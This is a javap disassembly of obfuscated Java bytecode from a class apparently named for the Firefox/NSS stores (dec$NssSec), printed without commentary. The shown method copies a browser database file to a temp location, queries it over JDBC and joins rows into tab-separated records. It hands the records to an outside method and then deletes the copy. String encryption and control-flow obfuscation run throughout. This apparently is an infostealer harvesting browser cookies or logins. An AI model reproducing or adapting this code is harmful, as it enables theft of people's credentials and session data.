        63: getstatic     #290                // Field a/b/d/dec$NssSec.m:Z
        66: new           #221                // class java/io/File
        69: dup
        70: aload_1
        71: aload         4
        73: invokespecial #312                // Method java/io/File."<init>":(Ljava/io/File;Ljava/lang/String;)V
        76: astore        10
        78: istore        9
        80: aload         10
        82: iload         9
        84: ifne          132
        87: invokevirtual #136                // Method java/io/File.exists:()Z
        90: ifne          99
        93: goto          97
        96: athrow
        97: return
        98: athrow
        99: new           #221                // class java/io/File
       102: dup
       103: ldc           #24                 // int -405268440
       105: sipush        -3546
       108: isub
       109: ldc           #24                 // int -405268440
       111: sipush        -22828
       114: isub
       115: lload_2
       116: l2i
       117: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       120: invokestatic  #56                 // Method java/lang/System.getProperty:(Ljava/lang/String;)Ljava/lang/String;
       123: invokestatic  #162                // Method java/util/UUID.randomUUID:()Ljava/util/UUID;
       126: invokevirtual #314                // Method java/util/UUID.toString:()Ljava/lang/String;
       129: invokespecial #97                 // Method java/io/File."<init>":(Ljava/lang/String;Ljava/lang/String;)V
       132: astore        11
       134: aload         10
       136: iload         9
       138: ifne          181
       141: aload         11
       143: ldc           #24                 // int -405268440
       145: sipush        -3600
       148: isub
       149: ldc           #8                  // int 405268440
       151: sipush        5161
       154: iadd
       155: lload_2
       156: l2i
       157: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       160: invokestatic  #402                // Method a/b/d/dec.cp:(Ljava/io/File;Ljava/io/File;Ljava/lang/String;)Z
       163: lload_2
       164: lconst_0
       165: lcmp
       166: ifle          177
       169: ifne          179
       172: aload         11
       174: invokevirtual #129                // Method java/io/File.delete:()Z
       177: pop
       178: return
       179: aload         11
       181: invokevirtual #408                // Method java/io/File.getAbsolutePath:()Ljava/lang/String;
       184: ldc           #24                 // int -405268440
       186: sipush        -3567
       189: isub
       190: ldc           #8                  // int 405268440
       192: sipush        1115
       195: isub
       196: lload_2
       197: l2i
       198: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       201: swap
       202: invokedynamic #60,  0             // InvokeDynamic #4:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       207: invokestatic  #272                // Method java/sql/DriverManager.getConnection:(Ljava/lang/String;)Ljava/sql/Connection;
       210: astore        12
       212: aload         12
       214: invokeinterface #117,  1          // InterfaceMethod java/sql/Connection.createStatement:()Ljava/sql/Statement;
       219: astore        13
       221: aload         13
       223: aload         5
       225: invokeinterface #252,  2          // InterfaceMethod java/sql/Statement.executeQuery:(Ljava/lang/String;)Ljava/sql/ResultSet;
       230: astore        14
       232: new           #84                 // class java/lang/StringBuilder
       235: dup
       236: invokespecial #368                // Method java/lang/StringBuilder."<init>":()V
       239: astore        15
       241: aload         14
       243: invokeinterface #337,  1          // InterfaceMethod java/sql/ResultSet.next:()Z
       248: ifeq          788
       251: iload         8
       253: lload_2
       254: lconst_0
       255: lcmp
       256: ifle          799
       259: iload         9
       261: ifne          799
       264: iconst_1
       265: iload         9
       267: lload_2
       268: lconst_0
       269: lcmp
       270: ifle          563
       273: ifne          561
       276: goto          280
       279: athrow
       280: if_icmpne     558
       283: goto          287
       286: athrow
       287: getstatic     #215                // Field q:I
       290: iconst_1
       291: iadd
       292: putstatic     #215                // Field q:I
       295: aload         15
       297: aload         14
       299: iconst_1
       300: invokeinterface #370,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       305: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       308: ldc           #11                 // String \t
       310: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       313: aload         14
       315: iconst_1
       316: invokeinterface #370,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       321: iload         9
       323: ifne          369
       326: goto          330
       329: athrow
       330: ldc           #20                 // String .
       332: invokevirtual #179                // Method java/lang/String.startsWith:(Ljava/lang/String;)Z
       335: lload_2
       336: lconst_0
       337: lcmp
       338: ifle          378
       341: ifeq          372
       344: goto          348
       347: athrow
       348: ldc           #24                 // int -405268440
       350: sipush        -3561
       353: isub
       354: ldc           #24                 // int -405268440
       356: sipush        -1411
       359: isub
       360: lload_2
       361: l2i
       362: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       365: goto          369
       368: athrow
       369: goto          389
       372: ldc           #24                 // int -405268440
       374: sipush        -3556
       377: isub
       378: ldc           #24                 // int -405268440
       380: sipush        -4329
       383: isub
       384: lload_2
       385: l2i
       386: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       389: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       392: ldc           #11                 // String \t
       394: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       397: aload         14
       399: iconst_2
       400: invokeinterface #370,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       405: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       408: lload_2
       409: lconst_0
       410: lcmp
       411: ifle          424
       414: ldc           #11                 // String \t
       416: iload         9
       418: ifne          467
       421: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       424: aload         14
       426: iconst_3
       427: invokeinterface #72,  2           // InterfaceMethod java/sql/ResultSet.getInt:(I)I
       432: iconst_1
       433: lload_2
       434: lconst_0
       435: lcmp
       436: ifle          482
       439: if_icmpne     470
       442: goto          446
       445: athrow
       446: ldc           #24                 // int -405268440
       448: sipush        -3597
       451: isub
       452: ldc           #24                 // int -405268440
       454: sipush        -23741
       457: isub
       458: lload_2
       459: l2i
       460: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       463: goto          467
       466: athrow
       467: goto          487
       470: ldc           #24                 // int -405268440
       472: sipush        -3548
       475: isub
       476: ldc           #8                  // int 405268440
       478: sipush        21105
       481: isub
       482: lload_2
       483: l2i
       484: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       487: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       490: ldc           #11                 // String \t
       492: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       495: aload         14
       497: iconst_4
       498: invokeinterface #244,  2          // InterfaceMethod java/sql/ResultSet.getLong:(I)J
       503: invokevirtual #61                 // Method java/lang/StringBuilder.append:(J)Ljava/lang/StringBuilder;
       506: ldc           #11                 // String \t
       508: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       511: aload         14
       513: iconst_5
       514: invokeinterface #370,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       519: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       522: ldc           #11                 // String \t
       524: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       527: aload         14
       529: getstatic     #264                // Field d:J
       532: l2i
       533: invokeinterface #370,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       538: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       541: ldc           #13                 // String \n
       543: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       546: pop
       547: iload         9
       549: lload_2
       550: lconst_0
       551: lcmp
       552: ifle          560
       555: ifeq          241
       558: iload         8
       560: iconst_2
       561: iload         9
       563: lload_2
       564: lconst_0
       565: lcmp
       566: iflt          715
       569: ifne          713
       572: if_icmpne     710
       575: goto          579
       578: athrow
       579: aload         15
       581: ldc           #24                 // int -405268440
       583: sipush        -3563
       586: isub
       587: ldc           #24                 // int -405268440
       589: sipush        -2065
       592: isub
       593: lload_2
       594: l2i
       595: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       598: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       601: aload         14
       603: iconst_1
       604: invokeinterface #370,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       609: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       612: ldc           #24                 // int -405268440
       614: sipush        -3605
       617: isub
       618: ldc           #24                 // int -405268440
       620: sipush        -3320
       623: iadd
       624: lload_2
       625: l2i
       626: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       629: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       632: aload         14
       634: iconst_2
       635: invokeinterface #370,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       640: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       643: ldc           #24                 // int -405268440
       645: sipush        -3547
       648: isub
       649: ldc           #24                 // int -405268440
       651: sipush        -2996
       654: isub
       655: lload_2
       656: l2i
       657: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       660: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       663: aload         14
       665: iconst_3
       666: invokeinterface #72,  2           // InterfaceMethod java/sql/ResultSet.getInt:(I)I
       671: invokevirtual #384                // Method java/lang/StringBuilder.append:(I)Ljava/lang/StringBuilder;
       674: ldc           #24                 // int -405268440
       676: sipush        -3599
       679: isub
       680: ldc           #8                  // int 405268440
       682: sipush        23832
       685: isub
       686: lload_2
       687: l2i
       688: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       691: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       694: pop
       695: iload         9
       697: lload_2
       698: lconst_0
       699: lcmp
       700: ifle          248
       703: ifeq          241
       706: goto          710
       709: athrow
       710: iload         8
       712: iconst_3
       713: iload         9
       715: ifne          729
       718: if_icmpne     241
       721: goto          725
       724: athrow
       725: getstatic     #393                // Field c:I
       728: iconst_1
       729: iadd
       730: putstatic     #393                // Field c:I
       733: aload         15
       735: aload         14
       737: iconst_1
       738: invokeinterface #370,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       743: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       746: ldc           #24                 // int -405268440
       748: sipush        -3550
       751: isub
       752: ldc           #8                  // int 405268440
       754: sipush        2694
       757: isub
       758: lload_2
       759: l2i
       760: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       763: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       766: aload         14
       768: iconst_2
       769: invokeinterface #370,  2          // InterfaceMethod java/sql/ResultSet.getString:(I)Ljava/lang/String;
       774: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       777: ldc           #13                 // String \n
       779: invokevirtual #278                // Method java/lang/StringBuilder.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;
       782: pop
       783: iload         9
       785: ifeq          241
       788: aload         15
       790: lload_2
       791: lconst_0
       792: lcmp
       793: ifle          782
       796: invokevirtual #122                // Method java/lang/StringBuilder.length:()I
       799: ifle          851
       802: aload         6
       804: aload         7
       806: ldc           #24                 // int -405268440
       808: sipush        -3596
       811: isub
       812: ldc           #24                 // int -405268440
       814: sipush        -8263
       817: isub
       818: lload_2
       819: l2i
       820: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       823: dup_x2
       824: pop
       825: ldc           #23                 // String /
       827: swap
       828: invokedynamic #266,  0            // InvokeDynamic #5:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       833: aload         15
       835: invokevirtual #50                 // Method java/lang/StringBuilder.toString:()Ljava/lang/String;
       838: getstatic     #106                // Field java/nio/charset/StandardCharsets.UTF_8:Ljava/nio/charset/Charset;
       841: invokevirtual #302                // Method java/lang/String.getBytes:(Ljava/nio/charset/Charset;)[B
       844: invokestatic  #159                // Method a/b/c/z.a:(Ljava/lang/String;[B)V
       847: goto          851
       850: athrow
       851: lload_2
       852: lconst_0
       853: lcmp
       854: iflt          878
       857: aload         14
       859: iload         9
       861: ifne          873
       864: ifnull        925
       867: goto          871
       870: athrow
       871: aload         14
       873: invokeinterface #79,  1           // InterfaceMethod java/sql/ResultSet.close:()V
       878: goto          925
       881: astore        15
       883: lload_2
       884: lconst_0
       885: lcmp
       886: iflt          910
       889: aload         14
       891: iload         9
       893: ifne          905
       896: ifnull        922
       899: goto          903
       902: athrow
       903: aload         14
       905: invokeinterface #79,  1           // InterfaceMethod java/sql/ResultSet.close:()V
       910: goto          922
       913: astore        16
       915: aload         15
       917: aload         16
       919: invokevirtual #267                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
       922: aload         15
       924: athrow
       925: lload_2
       926: lconst_0
       927: lcmp
       928: ifle          952
       931: aload         13
       933: iload         9
       935: ifne          947
       938: ifnull        999
       941: goto          945
       944: athrow
       945: aload         13
       947: invokeinterface #251,  1          // InterfaceMethod java/sql/Statement.close:()V
       952: goto          999
       955: astore        14
       957: lload_2
       958: lconst_0
       959: lcmp
       960: ifle          984
       963: aload         13
       965: iload         9
       967: ifne          979
       970: ifnull        996
       973: goto          977
       976: athrow
       977: aload         13
       979: invokeinterface #251,  1          // InterfaceMethod java/sql/Statement.close:()V
       984: goto          996
       987: astore        15
       989: aload         14
       991: aload         15
       993: invokevirtual #267                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
       996: aload         14
       998: athrow
       999: lload_2
      1000: lconst_0
      1001: lcmp
      1002: ifle          1026
      1005: aload         12
      1007: iload         9
      1009: ifne          1021
      1012: ifnull        1073
      1015: goto          1019
      1018: athrow
      1019: aload         12
      1021: invokeinterface #120,  1          // InterfaceMethod java/sql/Connection.close:()V
      1026: goto          1073
      1029: astore        13
      1031: lload_2
      1032: lconst_0
      1033: lcmp
      1034: ifle          1058
      1037: aload         12
      1039: iload         9
      1041: ifne          1053
      1044: ifnull        1070
      1047: goto          1051
      1050: athrow
      1051: aload         12
      1053: invokeinterface #120,  1          // InterfaceMethod java/sql/Connection.close:()V
      1058: goto          1070
      1061: astore        14
      1063: aload         13
      1065: aload         14
      1067: invokevirtual #267                // Method java/lang/Throwable.addSuppressed:(Ljava/lang/Throwable;)V
      1070: aload         13
      1072: athrow
      1073: aload         11
      1075: invokevirtual #129                // Method java/io/File.delete:()Z
      1078: pop
      1079: goto          1104
      1082: astore        12
      1084: aload         11
      1086: invokevirtual #129                // Method java/io/File.delete:()Z
      1089: pop
      1090: goto          1104
      1093: astore        17
      1095: aload         11
      1097: invokevirtual #129                // Method java/io/File.delete:()Z
      1100: pop
      1101: aload         17
      1103: athrow
      1104: return
      Exception table:
         from    to  target type
           799   847   850   Class java/lang/Throwable
           713   721   724   Class java/lang/Throwable
           572   706   709   Class java/lang/Throwable
           561   575   578   Class java/lang/Throwable
           421   463   466   Class java/lang/Throwable
           389   442   445   Class java/lang/Throwable
           330   365   368   Class java/lang/Throwable
           287   344   347   Class java/lang/Throwable
           280   326   329   Class java/lang/Throwable
           264   283   286   Class java/lang/Throwable
           251   276   279   Class java/lang/Throwable
            87    98    98   Class java/lang/Throwable
            80    93    96   Class java/lang/Throwable
           232   851   881   Class java/lang/Throwable
           903   910   913   Class java/lang/Throwable
           883   899   902   Class java/lang/Throwable
           851   867   870   Class java/lang/Throwable
           221   925   955   Class java/lang/Throwable
           977   984   987   Class java/lang/Throwable
           957   973   976   Class java/lang/Throwable
           925   941   944   Class java/lang/Throwable
           212   999  1029   Class java/lang/Throwable
          1051  1058  1061   Class java/lang/Throwable
           134   172  1082   Class java/lang/Exception
          1031  1047  1050   Class java/lang/Throwable
           999  1015  1018   Class java/lang/Throwable
           179  1073  1082   Class java/lang/Exception
           134   172  1093   any
           179  1073  1093   any
          1082  1084  1093   any
          1093  1095  1093   any

  static {};
    Code:
         0: ldc2_w        #417                // long 115084964021299l
         3: lstore        7
         5: bipush        54
         7: anewarray     #48                 // class java/lang/String
        10: astore        5
        12: iconst_0
        13: istore_3
        14: ldc           #4                  // String #/êx\u0090¶¾Ã~$\u008ff-A.O#h\u0093æ7W\u0096o\r­)\"]u\u001dQ\u0097¸ë=>nRÁ¦f\u0000;Ï÷\u0096 ¡9ysCÑ\u0012\u0098\u0096÷\u0004\u0003É¶\u008cdÜÞç,\'\u0080cö©,$>!\u0099(\u00073d\u0095L(¸|\u0006\fzm¯?}\u000bÅ\u009coSw[\u0097± 6³\u0012(\u001cNEìSÅgñ÷ì\u009dêg\u0011á$4\u0007V\u001da\u00102£\u0014mï+\u001bä\u0094w×x\u0097+ËÕö¹m$¡`¬\u0081\u0096ÆÄ\"ª¬Ü¡J Y\u0081,£\u009eÏa!¿\u0088à\u0087>I||\u0017\u0097À70Ý\u0017Qý¯¯§}D\u0005 \u0002\u0086ø\u00872H\u0010>I\u001eçt@\u0086;ÇB.ó\u008dns-\u009e\u001b\u0093\t¾ºvD\u0087,àHü-Ã[Ù3Ùhé\"\u0089k\u000eC\u0091\u009bòéoD7Ýïãº»8\fÀtÎ,¼«Õ9·!þ\u0095(ñB\nÆ\u0097-\u001b?ÿÒ\u0001ùõGãÏ>\u0080êÙ¶.~¡ç\u0081\tÙ»§Cz¾º\t¥\u0003\u0094k\u0006\u000b¯pàÌ\u0088üÒÕùae\u0007±`þÂh\u0099ï(Võþ0\tóÈä\u0085©N\u0096\u001cªÞr\u00997\u001e/(ð­z\u009dúF¶RJ~Ç\u0019\rýS\u009dJ¸Ý\r~\u0082î\"9åÌ´øîð\u008dÞ\u0004Ó\u0091bF\u000b\u0015\b\u0003\u0018cÙÙ\u0014\"\u0082ã\u0003\u008f¹\u001d\u0005\u008c{À|é\b°\u0080\u0093Ïp0\u008e\u0013\r\u0018u\u008f\u0005¨\u008e¼\u00826²Ù²H\u000bî(ÈÇ\u008d\u009drùíäç\u0002¼t\u0006R\u0005_b\u007f)\u0002£\u0084\u0011\u0010ê;¥`ª`s©d\u0095ÔÞ¾\u0094\u0007ç\u0005R_\u001bø\u0092\u0015\u008a\u0000pV\u0096yÊw)\u008cð\u008fÙí¢VéÐ}Ïe\u000e=áe9KQ£}¹º\u0094\u0082×\u0084\tÈ\u0019¨åI\u0087P\r\f,j6«G\u0082\u0003\u0015åÔà\u009bÀ®ß&è»ÝÙ¬¡\u0090\u008bz×Hi\u0012\u0096ð\n\u008dí°(óÑ¹ºP56\u0013\u0006\b\u009dB\u0019ÕÎ\u0003Qu\u000e\u0015\u0007Q °5o|¸\u0086O\u0097.\u009d\u0007\u008e\'{Ó\u0005°Æ\r7\u0090\u0010p\u0082 q\u0093\u0006¦FÚ|\b*Eô+Ç¨mÁ\u0011\u001c\u000fº\u0019P=f\u0081i?\u009f\fÎh¹ø\u008c\u0011g×Õ\u0002½^ÛíÞ²i½\u0010^b>÷\u0007ûW·$AEÊ\u0007;iÞ-\u0094Ðá\rg\u0007\u001a\u0082ÃþYX\u0003ßæõh\u0002\u009bý\r\u0019\fÕã:ÒfÝäo\u001aã÷\u0004ü]\u0087ß\u000e\u008c®©Õz\u0082s\u0086³\f\u0099\u0099òó\f¬Ù\u0080õ\u0006Ä\u001b\u009cF\u001by:\b)² \u0089\u0016øB\n\u001e©Ë\u0003eJ\u000eí­¸ºy\u0094\u00025\u009cËe\u001b,Í¤\u0011ý\u0015Fý©À\u008f§\u0003­yY\fqá\u0088N\u0090q\r\u00183rn­\u00118\u001b>\u009bÀmt\u008b+{Å7ÔÂÕ\u0088Ï\u0006ð\u0099\u000bñõ[
        16: dup
        17: astore_2
        18: invokevirtual #363                // Method java/lang/String.length:()I
        21: istore        4
        23: bipush        13
        25: istore_1
        26: iconst_m1
        27: istore_0
        28: iinc          0, 1
        31: aload_2
        32: iload_0
        33: dup
        34: iload_1
        35: iadd
        36: invokevirtual #245                // Method java/lang/String.substring:(II)Ljava/lang/String;
        39: iconst_m1
        40: goto          157
        43: aload         5
        45: swap
        46: iload_3
        47: iinc          3, 1
        50: swap
        51: aastore
        52: iload_0
        53: iload_1
        54: iadd
        55: dup
        56: istore_0
        57: iload         4
        59: if_icmpge     71
        62: aload_2
        63: iload_0
        64: invokevirtual #161                // Method java/lang/String.charAt:(I)C
        67: istore_1
        68: goto          28
        71: ldc           #15                 // String \u0085\u0007\u0091¶ªeMôÙüî\u0081\u001a,Únæ×\u009c/Y\u0011¬63´ç.ãóî\u000fÕ\u0002\tk\t\u0017¤
        73: dup
        74: astore_2
        75: invokevirtual #363                // Method java/lang/String.length:()I
        78: istore        4
        80: bipush        21
        82: istore_1
        83: iconst_m1
        84: istore_0
        85: iinc          0, 1
        88: aload_2
        89: iload_0
        90: dup
        91: iload_1
        92: iadd
        93: invokevirtual #245                // Method java/lang/String.substring:(II)Ljava/lang/String;
        96: iconst_0
        97: goto          157
       100: aload         5
       102: swap
       103: iload_3
       104: iinc          3, 1
       107: swap
       108: aastore
       109: iload_0
       110: iload_1
       111: iadd
       112: dup
       113: istore_0
       114: iload         4
       116: if_icmpge     128
       119: aload_2
       120: iload_0
       121: invokevirtual #161                // Method java/lang/String.charAt:(I)C
       124: istore_1
       125: goto          85
       128: aload         5
       130: putstatic     #232                // Field a:[Ljava/lang/String;
       133: bipush        54
       135: anewarray     #48                 // class java/lang/String
       138: putstatic     #405                // Field b:[Ljava/lang/String;
       141: ldc           #1                  // int -1315314369
       143: ldc           #10                 // int 1315318188
       145: lload         7
       147: l2i
       148: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       151: putstatic     #240                // Field v:Ljava/lang/String;
       154: goto          308
       157: swap
       158: invokevirtual #293                // Method java/lang/String.toCharArray:()[C
       161: dup
       162: arraylength
       163: swap
       164: iconst_0
       165: istore        6
       167: swap
       168: dup_x1
       169: iconst_1
       170: if_icmpgt     267
       173: dup
       174: iload         6
       176: dup2
       177: caload
       178: iload         6
       180: bipush        7
       182: irem
       183: tableswitch   { // 0 to 5
                       0: 220
                       1: 225
                       2: 230
                       3: 235
                       4: 240
                       5: 245
                 default: 250
            }
       220: bipush        94
       222: goto          251
       225: bipush        27
       227: goto          251
       230: bipush        88
       232: goto          251
       235: bipush        74
       237: goto          251
       240: bipush        122
       242: goto          251
       245: bipush        27
       247: goto          251
       250: iconst_1
       251: ixor
       252: i2c
       253: castore
       254: iinc          6, 1
       257: swap
       258: dup_x1
       259: ifne          267
       262: dup2
       263: swap
       264: goto          176
       267: swap
       268: dup_x1
       269: iload         6
       271: if_icmpgt     173
       274: new           #48                 // class java/lang/String
       277: dup_x1
       278: swap
       279: invokespecial #81                 // Method java/lang/String."<init>":([C)V
       282: invokevirtual #185                // Method java/lang/String.intern:()Ljava/lang/String;
       285: swap
       286: pop
       287: swap
       288: tableswitch   { // 0 to 0
                       0: 100
                 default: 43
            }
       308: ldc2_w        #415                // long -7052724748443827147l
       311: iconst_m1
       312: goto          321
       315: putstatic     #264                // Field d:J
       318: goto          332
       321: dup_x2
       322: pop
       323: lload         7
       325: lxor
       326: dup2_x1
       327: pop2
       328: pop
       329: goto          315
       332: ldc2_w        #429                // long 115084964021219l
       335: iconst_m1
       336: goto          345
       339: putstatic     #357                // Field e:J
       342: goto          356
       345: dup_x2
       346: pop
       347: lload         7
       349: lxor
       350: dup2_x1
       351: pop2
       352: pop
       353: goto          339
       356: ldc           #19                 // int -1315287450
       358: sipush        -26922
       361: iadd
       362: ldc           #21                 // int 1315287450
       364: sipush        27826
       367: iadd
       368: lload         7
       370: l2i
       371: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       374: invokestatic  #361                // Method java/lang/System.getenv:(Ljava/lang/String;)Ljava/lang/String;
       377: ldc           #19                 // int -1315287450
       379: sipush        -26963
       382: iadd
       383: ldc           #21                 // int 1315287450
       385: sipush        25663
       388: iadd
       389: lload         7
       391: l2i
       392: invokestatic  #313                // Method a:(III)Ljava/lang/String;
       395: invokedynamic #181,  0            // InvokeDynamic #6:makeConcatWithConstants:(Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
       400: putstatic     #338                // Field M:Ljava/lang/String;
       403: return

  private static java.lang.String a(int, int, int);
    Code:
         0: iload_0
         1: iload_2
         2: ixor
         3: sipush        -24274
         6: ixor
         7: ldc           #5                  // int 65535
         9: iand
        10: istore_3
        11: getstatic     #405                // Field b:[Ljava/lang/String;
        14: iload_3
        15: aaload
        16: ifnonnull     2627
        19: getstatic     #232                // Field a:[Ljava/lang/String;
        22: iload_3
        23: aaload
        24: invokevirtual #293                // Method java/lang/String.toCharArray:()[C
        27: astore        4
        29: aload         4
        31: iconst_0
        32: caload
        33: sipush        255
        36: iand
        37: tableswitch   { // 0 to 254
                       0: 1072
                       1: 1078
                       2: 1083
                       3: 1088
                       4: 1094
                       5: 1099
                       6: 1104
                       7: 1110
                       8: 1115
                       9: 1121
                      10: 1126
                      11: 1132
                      12: 1138
                      13: 1143
                      14: 1148
                      15: 1153
                      16: 1158
                      17: 1163
                      18: 1168
                      19: 1174
                      20: 1180
                      21: 1186
                      22: 1192
                      23: 1197
                      24: 1202
                      25: 1207
                      26: 1212
                      27: 1218
                      28: 1224
                      29: 1229
                      30: 1235
                      31: 1240
                      32: 1245
                      33: 1250
                      34: 1255
                      35: 1261
                      36: 1266
                      37: 1272
                      38: 1277
                      39: 1283
                      40: 1289
                      41: 1295
                      42: 1301
                      43: 1307
                      44: 1312
                      45: 1317
                      46: 1323
                      47: 1328
                      48: 1334
                      49: 1339
                      50: 1345
                      51: 1350
                      52: 1356
                      53: 1360
                      54: 1366
                      55: 1372
                      56: 1378
                      57: 1384
                      58: 1389
                      59: 1394
                      60: 1399
                      61: 1404
                      62: 1409
                      63: 1414
                      64: 1420
                      65: 1426
                      66: 1432
                      67: 1438
                      68: 1443
                      69: 1449
                      70: 1454
                      71: 1459
                      72: 1464
                      73: 1470
                      74: 1475
                      75: 1481
                      76: 1487
                      77: 1492
                      78: 1498
                      79: 1504
                      80: 1510
                      81: 1515
                      82: 1520
                      83: 1526
                      84: 1531
                      85: 1536
                      86: 1542
                      87: 1548
                      88: 1554
                      89: 1558
                      90: 1564
                      91: 1570
                      92: 1575
                      93: 1581
                      94: 1586
                      95: 1592
                      96: 1598
                      97: 1603
                      98: 1609
                      99: 1614
                     100: 1619
                     101: 1625
                     102: 1631
                     103: 1636
                     104: 1642
                     105: 1647
                     106: 1652
                     107: 1658
                     108: 1663
                     109: 1669
                     110: 1674
                     111: 1679
                     112: 1684
                     113: 1690
                     114: 1696
                     115: 1701
                     116: 1707
                     117: 1713
                     118: 1718
                     119: 1724
                     120: 1730
                     121: 1735
                     122: 1741
                     123: 1746
                     124: 1752
                     125: 1758
                     126: 1763
                     127: 1769
                     128: 1775
                     129: 1780
                     130: 1786
                     131: 1792
                     132: 1798
                     133: 1804
                     134: 1809
                     135: 1814
                     136: 1819
                     137: 1824
                     138: 1830
                     139: 1836
                     140: 1842
                     141: 1847
                     142: 1853
                     143: 1858
                     144: 1863
                     145: 1868
                     146: 1874
                     147: 1879
                     148: 1885
                     149: 1891
                     150: 1897
                     151: 1902
                     152: 1908
                     153: 1913
                     154: 1919
                     155: 1925
                     156: 1931
                     157: 1936
                     158: 1942
                     159: 1947
                     160: 1952
                     161: 1957
                     162: 1963
                     163: 1969
                     164: 1973
                     165: 1979
                     166: 1984
                     167: 1989
                     168: 1995
                     169: 2000
                     170: 2006
                     171: 2012
                     172: 2018
                     173: 2023
                     174: 2028
                     175: 2033
                     176: 2038
                     177: 2043
                     178: 2049
                     179: 2055
                     180: 2060
                     181: 2066
                     182: 2072
                     183: 2078
                     184: 2083
                     185: 2088
                     186: 2093
                     187: 2098
                     188: 2104
                     189: 2110
                     190: 2116
                     191: 2122
                     192: 2128
                     193: 2134
                     194: 2139
                     195: 2145
                     196: 2150
                     197: 2156
                     198: 2161
                     199: 2166
                     200: 2172
                     201: 2178
                     202: 2183
                     203: 2188
                     204: 2194
                     205: 2199
                     206: 2205
                     207: 2210
                     208: 2216
                     209: 2222
                     210: 2228
                     211: 2234
                     212: 2240
                     213: 2246
                     214: 2252
                     215: 2258
                     216: 2264
                     217: 2269
                     218: 2275
                     219: 2280
                     220: 2285
                     221: 2290
                     222: 2295
                     223: 2300
                     224: 2305
                     225: 2311
                     226: 2317
                     227: 2323
                     228: 2328
                     229: 2334
                     230: 2339
                     231: 2345
                     232: 2351
                     233: 2356
                     234: 2362
                     235: 2367
                     236: 2371
                     237: 2375
                     238: 2380
                     239: 2385
                     240: 2390
                     241: 2394
                     242: 2400
                     243: 2405
                     244: 2410
                     245: 2415
                     246: 2420
                     247: 2426
                     248: 2431
                     249: 2437
                     250: 2443
                     251: 2448
                     252: 2453
                     253: 2458
                     254: 2464
                 default: 2469
            }
      1072: sipush        235
      1075: goto          2471
      1078: bipush        25
      1080: goto          2471
      1083: bipush        83
      1085: goto          2471
      1088: sipush        162
      1091: goto          2471
      1094: bipush        6
      1096: goto          2471
      1099: bipush        125
      1101: goto          2471
      1104: sipush        210
      1107: goto          2471
      1110: bipush        95
      1112: goto          2471
      1115: sipush        212
      1118: goto          2471
      1121: bipush        113
      1123: goto          2471
      1126: sipush        170
      1129: goto          2471
      1132: sipush        229
      1135: goto          2471
      1138: bipush        13
      1140: goto          2471
      1143: bipush        34
